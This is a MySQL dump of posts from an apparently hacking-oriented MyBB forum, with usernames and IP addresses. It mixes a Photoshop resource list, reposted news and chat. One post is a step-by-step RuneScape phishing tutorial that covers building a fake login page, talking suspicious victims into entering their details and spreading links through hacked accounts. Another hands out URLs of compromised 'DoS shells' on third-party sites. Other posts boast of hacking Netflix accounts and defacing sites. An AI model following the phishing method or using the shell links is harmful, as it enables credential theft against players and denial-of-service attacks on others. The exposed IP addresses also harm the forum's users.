tutorials. Create designs by combining more pictures in one. Learn how to Add nice effects to pictures. [url=http://www.youtube.com/watch?v=tY2BBtPYips]Photoshop - Photo Manipulation - YouTube[/url] (The apple with lion face.) [url=http://www.youtube.com/watch?v=LTuXTxkAQgo]Photoshop CS4 Rainbow eyes tutorial. - YouTube[/url] [url=http://www.youtube.com/watch?v=6wHajsp12_U]Photoshop Tutorial: How to Create a Dazzling Dance Photo Manipulation - YouTube[/url] [url=http://www.youtube.com/watch?v=pzhT1OwLe9Y]\"Neuance\" Photo Effect | Photoshop CS5 Tutorial - YouTube[/url] [url=http://www.youtube.com/watch?v=koCwduw6-Ug]Adobe Photoshop Tutorial: Vintage & Retro - YouTube[/url] [url=http://www.youtube.com/watch?v=3rTkzBUhGwE]Maximize Detail Depth and Drama using Photoshop - YouTube[/url] [B]4. Typography -[/B] Learn how to make some cool typographic designs using the next tutorials. [url=http://www.youtube.com/watch?v=oEKWDocbmGk]Photoshop Tutorial - Typographic Design [HD] - YouTube[/url] [url=http://www.youtube.com/watch?v=1ycc-XL0Hdk]Photoshop Tutorial - Retro typography wallpaper - YouTube[/url] [url=http://www.youtube.com/watch?v=_9HOGrMoGlk]Simple Typography Tutorial - YouTube[/url] [B]5. Web Design -[/B] Some medium difficulty and well explained tutorials that will help you to start your career in web designing... [url]http://www.ultimatedesignertoolkit.com/tutorials/create-light-grunge-website-layout/[/url] [url]http://psd.fanextra.com/tutorials/how-to-create-an-effective-coming-soon-page/[/url] [url]http://www.psdcore.com/tutorials/web-layouts/modern-web-20-web-layout/[/url] [url]http://www.hv-designs.co.uk/2009/11/30/cloud9-web-design-layout/[/url] [url]http://artbox7.com/blog/tutorials/create-a-baby-template-in-photoshop-using-complete-designer-set.html[/url] [B]Now that\'s what I found on YouTube to be for easy to medium difficulty. So, I\'ll go to part 4 where I\'ll tell you where you can find more tutorials and resources for Photoshop.[/B] ------------------------------------------- [IMG]http://dl.dropbox.com/u/30675916/Thread/resources.png[/IMG] [B]1. Tutorials Websites -[/B] There\'s a list with websites where you can find thousands of tutorials and new ones coming everyday. [url]http://psd.tutsplus.com/[/url] [url]http://www.tutorial9.net/[/url] [url]http://photoshoptutorials.ws/[/url] [url]http://www.photoshoplady.com/[/url] [url]http://www.photoshopstar.com/[/url] [url]http://bestphotoshoptutorials.net/[/url] [url]http://www.adobetutorialz.com/categories/Adobe-Photoshop[/url] [url]http://www.psdvault.com/[/url] [url]http://psdvibe.com/category/photoshop/[/url] (Many Web Design tutorials.) [url]http://www.tutorialized.com/[/url] (Many PS Tutorials, including over 100 Web Design Tuts.) [B]2. Brushes Websites -[/B] Download brushes for your upcoming designs. Check the tutorial in Photoshop basics to learn how to install them.[/SIZE] [url]http://www.brusheezy.com/[/url] [url]http://myphotoshopbrushes.com/[/url] [url]http://www.psbrushes.net/[/url] [url]http://www.brushking.eu/[/url] [url]http://qbrushes.net/[/url] [url]http://www.brushlovers.com/[/url] [url]http://www.deviantart.com/[/url] (Use the search.) [B]3. Textures Websites -[/B] Download textures for your upcoming designs. Check the tutorial in Part 2 to learn how to use them. [url]http://www.textureking.com/[/url] [url]http://lostandtaken.com/[/url] [url]http://www.texturise.com/[/url] [url]http://www.grungetextures.com/[/url] [url]http://designm.ag/resources/2000-absolutely-free-textures/[/url] [url]http://www.smashingmagazine.com/2009/02/06/100-beautiful-free-textures/[/url] [url]http://www.deviantart.com/[/url] (Use the search.) [B]4. Stock Photo Sites -[/B] Download free stock for your upcoming designs. [url]http://www.stockvault.net/[/url] [url]http://www.everystockphoto.com/[/url] [url]http://www.deviantart.com/[/url] [url]http://www.shutterstock.com/[/url] (It\'s not Free!) [url]http://www.freedigitalphotos.net/[/url] [B]5. Fonts Websites -[/B] Download text fonts for your upcoming designs. [url]http://www.urbanfonts.com/[/url] [url]http://www.dafont.com/[/url] [url]http://www.ffonts.net/[/url] [url]http://www.fontspace.com/[/url] [B]6. Renders -[/B]Download free renders for your upcoming designs. [url]http://planetrenders.net/[/url] [url]http://www.premiumrenders.net/gallery/[/url] [url]http://pandorascanvas.com/gallery/album/2.html[/url] [url]http://22pixels.com/browse/renders/[/url] [B]7. PSD Files -[/B] Download free Photoshop files. [url]http://365psd.com/[/url] [url]http://freepsdfiles.net/[/url] [url]http://www.freebiepixels.com/[/url] [url]http://psdho.me/[/url] [url]http://www.hotpsd.com/[/url] [B]8. Online Tools & Images Hosting -[/B] Some more websites that will help you to upload your images, find fonts & pictures. [url]http://new.myfonts.com/WhatTheFont/[/url] - Find fonts used in logos or other designs. [url]http://www.tineye.com/[/url] - Reverse image search. Start by an edited picture to see the original one. [url]http://dropbox.com/[/url] - One of the best images hosting website. I recommend it. [url]http://photobucket.com/[/url] - The second images hosting website in my top. [url]http://www.toggl.com/[/url] - Time tracking tool for freelance web developers and designers who tend to get paid by the hour. [B]Thankyou for reading the guide and I hope this helped you in your graphic design career. :) Credits: Goes to me and [size=xx-small]blachex[/size] [/align][/color]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '857e568f175957f13595d3a302cd2251', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3010', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '100', '??zg???g????61', '1349036350', '[quote=\'iTzIpod\' pid=\'3001\' dateline=\'1349031624\'] Is it for your thread or just for your signature? O_o Because if it\'s for your thread, you\'re probably talking about a banner or template. [/quote] Nope its for my signature.', '65.96.215.138', '1096865674', '1', '0', '100', '1349036406', '1', '5af44cdea7fa26e6f17c2748f82848aa', '0', '1349036406'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3011', '621', '0', '61', 'Free Skype Credits from Bing Rewards', '0', '82', 'iTzIpod', '1349036377', '[img]http://www.flaxg.com/wp-content/uploads/2012/09/Free-Skype-Credit.jpg[/img] Bing recently announced the Ultimate Bing Experience Sweepstakes and much more. By Participating in those sweepstakes you can Get Free Skype Credits Worth $1.46. Cheap Internationale Calls can done using these Free Skype credits. Bing is the second largest search engine on the web; most of the users in United States are using Bing as Default search engine. According to the Alexa Global Traffic Ranking it’s in 22nd position. In United States its Alexa Traffic Ranking is in 14th position. Bing is the Top competitor for Google. Get Started With Free Skype Credits: [color=#FF0000][Before Going Below , Make sure you Have USA VPN/ Proxy , Becuse this Method only works for US residencial peoples][/color] Free Skype Credit Before we get started you need to have Hotmail or Facebook account. Step 1: Go to http://www.bing.com/explore/rewards Step 2: After you open the page you will find an option “Join Now” go to that page and you will find an options to Claim your Bing Rewards account with 1. Claim your rewards with Facebook 2. Claim your rewards with Windows live Just Sign Up using any of the options on the page. If you don’t have the Hotmail & Facebook account you will find an option to Sign Up for those accounts. Step 3: After signing up successfully just go to the “Dashboard” where you will find some Task’s. Step 4: Daily you need to Complete those Task’s you will be rewarded with some Credits. Step 5: After you complete the Task’s in “Dashboard”, you need to go to “Tours” again there you will find 2 options “Welcome” & “Explore Bing”. Step 6: Complete all the Bing Rewards Tours in those above 2 options, after you complete those Tours you will be rewarded with some Bing Credits and these points are one time points. Step 7: And this way you need to complete few Task’s every day doing some simple Bing Searches and Clicks. Step 8: Daily you can earn up to 15 Credits by doing 30 Bing Searches and few points for completing some Task’s or clicks. Step 9: After you generate few credits you can redeem those credits. In the Bing Rewards page you will find an option “Redeem”, just go to that page and you will see May Offers. How to Redeem Bing Credits: You will find many Offers to redeem those Bing Credits; you need to collect required credits to Redeem or to participate in Bing Sweepstakes. To get Free Skype Credits you need to have 100 Bing Credits, and to get Amazon $5 Gift Card you need to have 525 Bing Credits. On the site you will find many Offers. And you can enter in to Bing Sweepstakes to win Xbox 360 for Kinect Prize Pack with “FIFIA Soccer 13” and much more Sweepstakes are available. [img]http://www.flaxg.com/wp-content/uploads/2012/09/Bing-Rewards-leveles-300x276.jpg[/img] Free Skype Credits – Bing Rewards levels And there are some Levels where you can get some Bonus and Discounts on the Sweepstakes and Offers, there are 3 levels Member Silver Gold If you reach Gold Level you have all the Benefits where you can get Free Skype Credits for only 90 Bing Credits. And up to 10% Discounts on all other rewards and etc. How to Redeem Free Skype Credits: After you reach 100 Bing Credits you can redeem those credits to get Free Skype Credits, after redeeming those credits within a few minute you will be emailed with Free Skype Credit Code and instructions to redeem those Free Skype Credits. Visit www.skype.com/voucher Sign in to your Skype Account You will find an option to Redeem the coupon code Enter your Free Skype Credit Code there and agree to the Skype Terms of Use and Click Redeem Within few seconds you Free Skype Credits will be Credited to your Skype Account. Each Free Skype Credit Worth is $1.46 Free Skype Credits – Skype Telephony Voucher [img]http://www.flaxg.com/wp-content/uploads/2012/09/Skype-Telephony-Voucher-300x49.jpg[/img] Using the above methods you can Generate Unlimited Free Skype Credits Daily. And call your Friends and Family for Free and stay connected with them. Cheap International and VoIP Calls can be done using Free Skype Credits.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '99836e5875f4adc5638a7f42c781c8b1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3012', '614', '3002', '3', 'RE: Absence for 5 days', '0', '1', 't3h jok3r', '1349036628', 'Bye and have a safe journey.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '88f2b5d3e59539c45503e5a4a80c2b23', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3013', '622', '0', '42', 'Founder of the Pirate Bay Gottfrid Svartholm Arrested in Cambodia', '0', '82', 'iTzIpod', '1349037236', '[align=center][img]http://4.bp.blogspot.com/-DC0Jfdtk_n4/UELSDdP7AXI/AAAAAAAAFMo/aN_p-CwIdpA/s1600/Founder+of+the+Pirate+Bay+Gottfrid+Svartholm+Arrested+in+Cambodia.jpg[/img][/align] Reports indicate that the founder of the popular file-sharing site The Pirate Bay, Gottfrid Svartholm, was arrested up by Cambodian police on Thursday. There\'s no indication as to what the 27-year-old was specifically arrested for, but Svartholm\'s lawyer has since been quoted as saying that the arrest likely relates to Svartholm\'s presence on an \"international wanted list.\" Although there\'s no formal extradition treaty between Cambodia and Sweden, it\'s possible that Svartholm could be shipped back to Sweden to begin serving a 12-month jail sentence finalized in October of last year. Svartholm was originally supposed to join three Pirate Bay colleagues in a November 2010 decision by the Swedish Appeal Court, which doled out prison sentences ranging from four to 10 months and millions of dollars\' worth of damages to the trio. Svartholm\'s sentence, however, was not finalized at that time, as medical reasons prevented him from attending the related hearings. Since then, he had proven increasingly impossible to locate – so much so, that his verdict was finalized by the same Court of Appeal last October without him even being present. He was expected to begin serving his sentence in early January – 12 months in jail and a large chunk of fines split between the four Pirate Bay defendants in total – but did not appear. The four Pirate Bay accomplices were initially charged with \"assisting copyright infringement\" and \"assisted making available copyright infringement\" in January of 2008. Although Swedish prosecutors had to drop the \"assisting copyright infringement\" charge on the second day of the trial, they were ultimately successful in showing that the group was responsible for making 33 different copyrighted files available for sharing on the main Pirate Bay site. Svartholm was arrested in his home city of Phnom Penh. There haven\'t been any additional updates as to the condition of his health, nor any speculation as to how that might play into his potential extradition and jail sentence.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f6ca7c5e397c210bc877fa4d1b54dc9f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3014', '623', '0', '42', 'Mom poured bleach into baby\'s eyes', '0', '82', 'iTzIpod', '1349037328', 'Mom \'Repeatedly Poured Bleach into her toddler\'s EYES until her Sight was Permanently Damaged\' Authorities became suspicious when they noticed the eye drops Jennifer Mothershead had been administering to her 15-month-old daughter had a strange odour Motherhead has pleaded not guilty By Daily Mail UK 1 May 2012 A mother from Washington has been charged with assault after it was alleged she repeatedly put bleach into her young daughter’s eyes. Jennifer Mothershead, 29 from Bonney Lake, is thought to have caused permanent vision loss in her 15-month-old daughter’s right eye. Authorities became suspicious in May last year when the little girl was airlifted from Tacoma to Seattle’s Harborview Medical Center after suffering a blow to the head, according to Q13 FOX News. [img]http://i.dailymail.co.uk/i/pix/2012/05/01/article-0-12DB1075000005DC-253_634x344.jpg[/img] When she was treated, medical staff observed a previously diagnosed eye condition had got worse. Doctors became suspicious that the head injury was a result of abuse and called the Pierce County Sheriff’s Department. Mothershead did not explain how her daughter had got the head injury, and according to a detective, did not show any emotion about the girl’s injuries. The 15-month-old was taken into protective custody. When hospital staff and detectives examined the girl’s eye drops that she had been using for her condition more closely, they noticed they had a strong smell. A detective tested a few drops on his wrist and said they caused a minor burning sensation. \'One of the things our detectives were concerned about was a lack of concern for the toddler from the mom and we started looking into it,\' Pierce County Sheriff\'s Department spokesman Ed Troyer told Q13 FOX News. \'We found one of the eye drop bottles of chemicals, which basically burned our detectives. It obviously wasn’t something that should be going in someone’s eyes.\' The eye drops were sent for testing to the Food and Drug Administration’s Forensic Chemistry labs, where scientists found that they contained bleach. The eye injuries suffered by the little girl matched up with the symptoms of bleach exposure and she had suffered to such an extent that medical staff ruled out the possibility that the dropper had simply been cleaned with bleach. The girl\'s condition has improved, but doctors say she has permanently lost vision in her right eye. Now two years old, she has been living with her father since last spring. Mothershead has pleaded not guilty and her bail was set at $150,000.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '46374f46a993e9e885aa02d10034a365', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3015', '624', '0', '42', 'Aliens Found In Brazil (Photos - Fake or Real)?', '0', '82', 'iTzIpod', '1349037413', '[align=center][b][size=large][color=#FF0000]Strange photo shows the world the British tabloid Daily Mail. The pictures of the tropical undergrowth on a group of people watching the unusual creature like an alien. A right of another strange sight, a thick shiny blob.[/color][/size] [img]http://www.odditieszone.com/wp-content/uploads/2011/10/alien-brazil-1.jpg[/img] [img]http://www.odditieszone.com/wp-content/uploads/2011/10/alien-brazil-2.jpg[/img] [img]http://www.odditieszone.com/wp-content/uploads/2011/10/alien-brazil-3.jpg[/img] [size=large][color=#FF4500]What do you guys think?[/color][/size][/b][/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5d626669886ea538db1e37b4bb0dfb60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3016', '624', '3015', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '1', 't3h jok3r', '1349038419', 'They seem to be real. If there is life on earth then I believe there is more life out side of Earth.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '944bee1bac45f3a0c0252e05d9cb1078', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3017', '624', '3015', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '82', 'iTzIpod', '1349038557', 'That\'s actually quite try. [quote] If there is life on earth then I believe there is more life out side of Earth. [/quote]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '735d0aac48972fb0ba55a34ef75010bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3018', '601', '2993', '3', 'RE: Major Announcement by Jok3r!', '0', '1', 't3h jok3r', '1349038705', '[quote=\'iTzIpod\' pid=\'2993\' dateline=\'1349026259\'] 3 Admins? O_o Seems legit. Unless he demotes Apathy and then promotes you. [/quote] Apathy is a long term Admin and there can be 3 admins I have no problem having 3 admins but when the site gets bigger than 3 admins are reasonable.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '440ef981b74bca04dd4884ff395b9b6a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3019', '625', '0', '61', 'Runescape Phishing Tutorial', '0', '82', 'iTzIpod', '1349039715', 'Hello, today I will be showing you a runescape phisher. This is NOT mine. This was made by Karen and Tuffs from Runemart.com. First you will need to go to their website. http://p.hish.it When you arrive at the website, it will look like this. [URL=http://imageshack.us/photo/my-images/339/68565896.png/][IMG]http://imageshack.us/a/img339/3920/68565896.png[/IMG][/URL] Next step is to register a account. Click the register button located near the top of the screen and you will be brought to this page below. [URL=http://imageshack.us/photo/my-images/827/33160529.png/][IMG]http://imageshack.us/a/img827/8731/33160529.png[/IMG][/URL] Once you have created your account, login and you should be presented with this page. [URL=http://imageshack.us/photo/my-images/651/61146165.png/][IMG]http://imageshack.us/a/img651/5638/61146165.png[/IMG][/URL] To make your phising site, requires hardly any effort at all. P.hish.it create you a website for free. To me it looks pretty legit, if you dont look at the url bar. Go to the phising tab, click links and you should see a orange box containing a warning message. [URL=http://imageshack.us/photo/my-images/854/98373517.png/][IMG]http://imageshack.us/a/img854/2535/98373517.png[/IMG][/URL] Warning! You must set up a domain first, by clicking [u]here[/u]. Click the word \"here\" and you will be taken to this page. [URL=http://imageshack.us/photo/my-images/571/67890073.png/][IMG]http://imageshack.us/a/img571/3889/67890073.png[/IMG][/URL] On this page, you can choose what domain and subdomain you want to use for your phising links. You can also give permissions to certain people within your team but we wont go into detail on that. Click submit in the bottom right corner and go back to the link page. You should see that your links have changed and now have the domain and subdomain you chose to use. [URL=http://imageshack.us/photo/my-images/836/29557660.png/][IMG]http://imageshack.us/a/img836/6496/29557660.png[/IMG][/URL] When your target clicks the link he will be taken to this page [URL=http://imageshack.us/photo/my-images/189/38185978.png/][IMG]http://imageshack.us/a/img189/4910/38185978.png[/IMG][/URL] It\'s a pretty convincing site if your target doesn\'t notice the fake url. I had a person today who said SCAM. I simply told him a load of bullshit and he ended up entering his information in. Some people may notice it but try to convince them it works. If they don\'t go along with it, leave them and try to get another target. If you want ways of attracting people to your links. Either make a youtube channel with a video and advertise over youtube or you can create or get a few hacked accounts and spam on them saying Want FREE members ? Search \"Youtubenamehere\" on youtube. Please leave a thank you if this tutorial has helped you and feel free to tell me if I need to improve something.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9a81e6d6351046844ae8909296ae78bc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3020', '626', '0', '19', '[Junk]?? Best Free Private DoS Shells ?? 57 Private Free Shells', '0', '82', 'iTzIpod', '1349040117', '[size=medium][font=Trebuchet MS][align=center]Okay so today I got bored and use a special method of mine and within 30 Minutes I got around 57 DoS Shells, since I don\'t know what to do with them I decided to give them away. Screenies: 10 Second Attacks [spoiler][img]http://i.imgur.com/7JCyl.jpg[/img][/spoiler] TEST SHELLS: http://www.atwservice.com/media.php http://wastebook.com/burner.php [color=#FF0000]So to get 55 more hard hitting DoS shells post here and PM me thanks.[/color] [/align][/font][/size]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a12eca0e8acad035c727dda977746d56', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3021', '604', '2998', '61', 'RE: Unique Sig and Header', '0', '1', 't3h jok3r', '1349041269', '[quote=\'R?????zo?\' pid=\'2998\' dateline=\'1349028513\'] if you really want something like that, i can make it no problems. i will do that if it\'s going to be used though, else will be a waste of time. [/quote] I agree no one would take out time and waste their energy to think they after they finally make something someone decides to not use it anymore.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'e72e15e1a5ba71b44f9ccb43c16dceb0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3022', '601', '2914', '3', 'RE: Major Announcement by Jok3r!', '0', '3', '??????????¢™', '1349044654', 'Sounds good to me Joker', '75.35.239.228', '1260646372', '1', '0', '0', '0', '1', 'e5e55efd66b354f4c403006757435bef', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3023', '624', '3015', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '1', 't3h jok3r', '1349048518', 'What do you mean to say?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c7ae6450f3d628e0d927f2aee56f85c5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3024', '624', '3015', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '82', 'iTzIpod', '1349048615', 'I meant to say that I agree with what you said.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b9603f8da7aa8149dcf091fcb35afa40', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3025', '514', '2551', '9', 'RE: How to make serious money', '0', '1', 't3h jok3r', '1349048634', 'That\'s a very complicated process. It\'s better to just send the email by copying the template.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ae63043adb705972fc11651b24ba36a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3026', '624', '3015', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '100', '??zg???g????61', '1349048755', 'I lol\'d no way theres aliens xDD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'abd3eb937e62d06b54c056aed907af4b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3027', '627', '0', '33', 'What can I do to improve this?', '0', '82', 'iTzIpod', '1349048760', '[img]http://i.imgur.com/sI4LV.png[/img] What do you think I can do to improve this picture? Or if you want, download the .PSD file and then edit the things :p And then show me your results. (Please upload the .PSD file once you\'re done so I can see what you did.) Download: http://lh.rs/f3CSmwFQpbY8 :p I know, I suck at GFX.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '31d3e81d087941548a7a1a654fa8c113', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3028', '624', '3026', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '82', 'iTzIpod', '1349048824', '[quote=\'GRONgamer61\' pid=\'3026\' dateline=\'1349048755\'] I lol\'d no way theres aliens xDD [/quote] Get on Skype and lol for me please. :p EDIT: Your laugh is so funny :p', '24.212.197.164', '416597412', '1', '0', '82', '1349049098', '1', 'e7bb1cf3c11870e2962d95bdf71ebaec', '0', '1349049098'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3029', '624', '3024', '42', 'RE: Aliens Found In Brazil (Photos - Fake or Real)?', '0', '1', 't3h jok3r', '1349048847', '[quote=\'iTzIpod\' pid=\'3024\' dateline=\'1349048615\'] I meant to say that I agree with what you said. [/quote] Well there\'s another part of me that says the aliens are fake because there\'s not hardcore proof that aliens exist and anyone can edit a pic.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '03d06bdb51bfcfcdb03b69237386fb77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3030', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '1', 't3h jok3r', '1349048967', 'I like prison break too lol. I\'m going to watch in a few mins.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f55b88f0e22cd4a08e71a68f61436f91', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3031', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '82', 'iTzIpod', '1349049010', 'Finished the series like I said. Just hacked 3 Netflix accounts.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '89a921b1850e9c87ba4b819ad0a76f6e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3032', '508', '2538', '13', 'RE: Awesome deface page source + PSD', '0', '8', 'spacefish36', '1349049251', 'No problem enjoy when you deface a site lemme know', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2be0acc0c3fa3edabd1e2dd2eba70716', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3033', '351', '1651', '46', 'RE: Phishing Tutorial', '0', '8', 'spacefish36', '1349049375', 'Good Luck Apathy and what site are you going to try it on?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'e7f7f45ba27f355514ac0e6146eec27d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3034', '509', '2539', '21', 'RE: The world of DDoS Attacks', '0', '8', 'spacefish36', '1349049514', 'I kinda understood what you meant and hope you enjoy the tutorial. I hope jok3r saw this cuz this is helpful for him.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'b841277b977e54c7f0dd20d5617706c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3035', '615', '3004', '21', 'RE: Could somone test the output of 2 differen\'t booters I use?', '0', '8', 'spacefish36', '1349049598', 'What do you mean? Like DDoS a site and check if it works or help you finish it up?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 